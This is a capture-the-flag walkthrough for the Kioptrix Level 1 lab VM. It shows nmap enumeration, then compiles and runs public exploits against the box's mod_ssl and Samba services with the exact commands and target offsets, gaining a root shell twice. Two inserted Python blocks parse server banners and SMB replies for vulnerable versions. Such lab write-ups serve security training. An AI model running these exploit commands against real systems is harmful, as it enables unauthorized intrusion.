-rw-r--r--  1 root root 47 Oct 10  2009 /etc/issue.bak


[-] Any interesting mail in /var/mail:
lrwxrwxrwx  1 root root 10 Oct  7  2009 /var/mail -> spool/mail


### SCAN COMPLETE ####################################

OSCP like Vulnhub machines: Kioptrix: Level 1 (#1)

Kudos to abatchy’s blog for compiling this list.

Download VM

Let’s start the enumeration with nmap.

nmap -sCV -v -oA tcp 192.168.1.8

And we got the following output.

# Nmap 7.80 scan initiated Sat Dec 12 01:55:02 2020 as: nmap -sCV -v -oN tcp 192.168.1.8
Nmap scan report for 192.168.1.8
Host is up (0.0032s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-12-12T07:57:57+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:00:00:00:00:00(VMware)

Host script results:
|_clock-skew: 1h01m48s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   MYGROUP<00>          Flags: <group><active>
|_  MYGROUP<1e>          Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 12 01:57:08 2020 -- 1 IP address (1 host up) scanned in 126.36 seconds

Now, there are at least two ways to root this machine.

Method #1

I found ports 80 and 443 open. But upon closer inspection and some directory brute-forcing with gobuster, I felt that it was a rabbit hole. However, notice the banner of the web server: it reports the server version as Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

On searchsploit-ing the mod_ssl version, we got a potential match.

With some trial and error, I found a working exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2).
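The banner-to-vulnerable-version reasoning above, written out as a small check (an added example, not part of the original writeup): it splits an Apache-style Server header into product/version pairs and flags a mod_ssl build older than 2.8.7, the threshold named in the exploit title. The first sample banner is the one Nmap reported above; the second is made up for contrast, and the function names are mine. The same parser is what a defender would run over their own inventory of Server headers to catch builds that old before anyone else does.

```python
import re
from typing import Dict, List, Tuple

# Constructed samples: the first is the Server header Nmap reported above, the
# second is a made-up newer banner used for contrast (not from the page).
SAMPLE_BANNERS: List[str] = [
    "Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "Apache/1.3.27 (Unix) mod_ssl/2.8.12 OpenSSL/0.9.7",
]

# Threshold taken from the exploit title above: mod_ssl < 2.8.7.
MOD_SSL_FIXED = "2.8.7"

# One "product/version" token, e.g. "mod_ssl/2.8.4" or "OpenSSL/0.9.6b".
_TOKEN = re.compile(r"([A-Za-z_][\w.-]*)/(\d+(?:\.\d+)*[a-z]?)")
_VERSION = re.compile(r"(\d+(?:\.\d+)*)([a-z]?)")


def parse_server_header(banner: str) -> Dict[str, str]:
    """Map every product named in an Apache-style Server header to its version string.
    Parenthesised platform notes such as "(Red-Hat/Linux)" carry no numeric version
    and are skipped by the token regex."""
    return {name: version for name, version in _TOKEN.findall(banner)}


def version_key(version: str) -> Tuple[Tuple[int, ...], str]:
    """Turn "2.8.4" or "0.9.6b" into something comparable: numeric parts first,
    then the OpenSSL-style letter suffix ("" sorts before "a")."""
    m = _VERSION.fullmatch(version)
    if m is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(p) for p in m.group(1).split(".")), m.group(2)


def is_older_than(version: str, threshold: str) -> bool:
    """Numeric comparison, so 2.8.12 is correctly newer than 2.8.7."""
    return version_key(version) < version_key(threshold)


def assess(banner: str) -> Dict[str, object]:
    """Return the parsed components plus any finding a defender should act on."""
    components = parse_server_header(banner)
    findings: List[str] = []
    mod_ssl = components.get("mod_ssl")
    if mod_ssl is not None and is_older_than(mod_ssl, MOD_SSL_FIXED):
        findings.append(f"mod_ssl {mod_ssl} is older than {MOD_SSL_FIXED}")
    return {"components": components, "findings": findings}


if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(banner)
        print("  ", assess(banner))
```

Note the numeric comparison in version_key: a plain string compare would call 2.8.12 older than 2.8.7, which is exactly the kind of mistake that lets a patched host slip into (or a vulnerable one out of) a report.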

The exploit was compiled with the following command as instructed in the exploit code.

gcc -o OpenFuck 47080.c -lcrypto

Upon compiling the exploit, I found out that it requires the exact version of Apache: it takes a hexadecimal number corresponding to the target's Linux distribution and Apache version.

I had found the Linux distribution to be Red Hat and the Apache version to be 1.3.20.

From the above list, the hex number I needed is 0x6b. The syntax to execute the exploit is as follows, where 443 is the port number and -c 40 specifies the number of connections (I don't think it was required, at least in our case).

./OpenFuck 0x6b 192.168.1.8 443 -c 40

And we have the root shell!

Method #2

Now the next exploitation method is a little bit tricky. The vulnerability is in the Samba package, but the SMB version is (kind of) hidden and we have to enumerate it manually.

Usually, to enumerate the SMB version manually, we can rely on SMB version enumeration scripts like this or this. If they aren’t working as they should, we can always use Wireshark to enumerate the version manually, using display filters like,

smb and ip.src=={IP}

and look at the TCP stream.

As we can see, there is no version information in the SMB response.
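For readers who want to see where that version string would normally sit in the stream, here is an added example (not part of the original writeup, and not from any tool named on the page): an SMB1 Session Setup AndX reply carries three trailing NUL-terminated strings, NativeOS, NativeLanMan and PrimaryDomain, and Samba's version announcement lives in NativeLanMan. The parser below pulls them out of a NetBIOS-framed reply, handling both the Unicode and ASCII encodings. Both sample replies are constructed inline with the builder in the block; the "Samba 9.9.9-example" string is a placeholder, not this host's real version, and the builder and function names are mine. Run against the raw bytes of a reply exported from Wireshark, it tells you whether a server is disclosing its version, which is the check to run against your own file servers.

```python
"""Constructed SMB1 Session Setup AndX replies and a parser for the trailer strings
(NativeOS / NativeLanMan / PrimaryDomain) where Samba normally announces itself."""
import struct
from typing import Dict, Optional

SMB_MAGIC = b"\xffSMB"
SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000


def build_session_setup_response(native_os: str, native_lanman: str,
                                 domain: str, unicode: bool = True) -> bytes:
    """Build a minimal NetBIOS-framed Session Setup AndX reply (layout per MS-CIFS 2.2.4.53.2).
    Only used here to produce constructed samples; a real reply would come from a capture."""
    header = SMB_MAGIC + struct.pack(
        "<BIBHH8sHHHHH",
        SMB_COM_SESSION_SETUP_ANDX,        # Command
        0,                                 # Status: NT_STATUS_SUCCESS
        0x98,                              # Flags: reply, canonical paths, case-insensitive
        FLAGS2_UNICODE if unicode else 0,  # Flags2
        0, b"\0" * 8, 0,                   # PIDHigh, SecurityFeatures, Reserved
        0, 0, 0x0800, 0)                   # TID, PIDLow, UID, MID
    fields = (native_os, native_lanman, domain)
    if unicode:
        # One pad byte: Unicode strings are 2-byte aligned relative to the SMB header.
        data = b"\0" + b"".join(s.encode("utf-16-le") + b"\0\0" for s in fields)
    else:
        data = b"".join(s.encode("ascii") + b"\0" for s in fields)
    params = struct.pack("<BBBHHH",
                         3,          # WordCount
                         0xFF,       # AndXCommand: no chained command
                         0,          # AndXReserved
                         0,          # AndXOffset
                         0,          # Action: 0 = authenticated, 1 = guest
                         len(data))  # ByteCount
    smb = header + params + data
    return struct.pack(">I", len(smb)) + smb  # NetBIOS session message: type 0x00 + 3-byte length


def _read_cstring(buf: bytes, pos: int, end: int, unicode: bool):
    """Read one NUL-terminated string; returns (text, position after the terminator)."""
    if unicode:
        i = pos
        while i + 1 < end and buf[i:i + 2] != b"\0\0":
            i += 2  # stay on UTF-16 code-unit boundaries so a 0x00 byte inside a char is not a terminator
        if i + 1 >= end:
            raise ValueError("unterminated Unicode string")
        return buf[pos:i].decode("utf-16-le"), i + 2
    i = buf.index(b"\0", pos, end)
    return buf[pos:i].decode("latin-1"), i + 1


def parse_session_setup_response(frame: bytes) -> Dict[str, Optional[str]]:
    """Return the three trailer strings: None = not sent at all, "" = sent but empty."""
    nb_len = int.from_bytes(frame[1:4], "big")
    if frame[0] != 0 or len(frame) < 4 + nb_len:
        raise ValueError("not a complete NetBIOS session message")
    smb = frame[4:4 + nb_len]
    if smb[:4] != SMB_MAGIC or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not an SMB1 Session Setup AndX message")
    unicode = bool(struct.unpack_from("<H", smb, 10)[0] & FLAGS2_UNICODE)  # Flags2 at offset 10
    word_count = smb[32]                  # first byte after the fixed 32-byte header
    pos = 33 + 2 * word_count             # ByteCount follows the parameter words
    byte_count = struct.unpack_from("<H", smb, pos)[0]
    pos += 2
    end = pos + byte_count
    if unicode and pos % 2:
        pos += 1                          # skip the alignment pad
    result: Dict[str, Optional[str]] = {"native_os": None, "native_lanman": None, "primary_domain": None}
    for name in result:
        if pos >= end:
            break
        result[name], pos = _read_cstring(smb, pos, end, unicode)
    return result


def discloses_version(frame: bytes) -> bool:
    """True when NativeLanMan carries a version number, e.g. 'Samba 2.x.y'."""
    lanman = parse_session_setup_response(frame)["native_lanman"] or ""
    return any(ch.isdigit() for ch in lanman)


# Constructed samples (not captured from the Kioptrix VM): a chatty server and a quiet one.
CHATTY_REPLY = build_session_setup_response("Unix", "Samba 9.9.9-example", "MYGROUP")
QUIET_REPLY = build_session_setup_response("", "", "", unicode=False)

if __name__ == "__main__":
    for label, frame in (("chatty", CHATTY_REPLY), ("quiet", QUIET_REPLY)):
        print(label, parse_session_setup_response(frame), "discloses version:", discloses_version(frame))
```

A quiet reply like the second sample is what the Wireshark stream above showed for this host: the fields are there but empty, so the version has to be inferred some other way, which is what the next steps do.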

So, let’s enumerate the SMB version manually using a Google dork.

apache 1.3.20 site:rpm.pbone.net

Where rpm.pbone.net is a website that has details about the packages in Red Hat Linux.

We’ve got the date from the package. We can use Wikipedia’s Red Hat version history page to find the version of Red Hat.

We’ve got the Red Hat version as 7.2, since its release date is around the date we discovered on rpm.pbone.net.

Performing a Google search with the Red Hat version presented us with the following information.

Using searchsploit presented the following information.

The exploit we are looking for is the remote code execution one. I compiled it with

gcc 10.c -o samba

and ran it with the following command

./samba -b 0 -v 192.168.1.8

where -b 0 specifies the platform and -v is used for verbose output.

And voilà!

We are root. Again!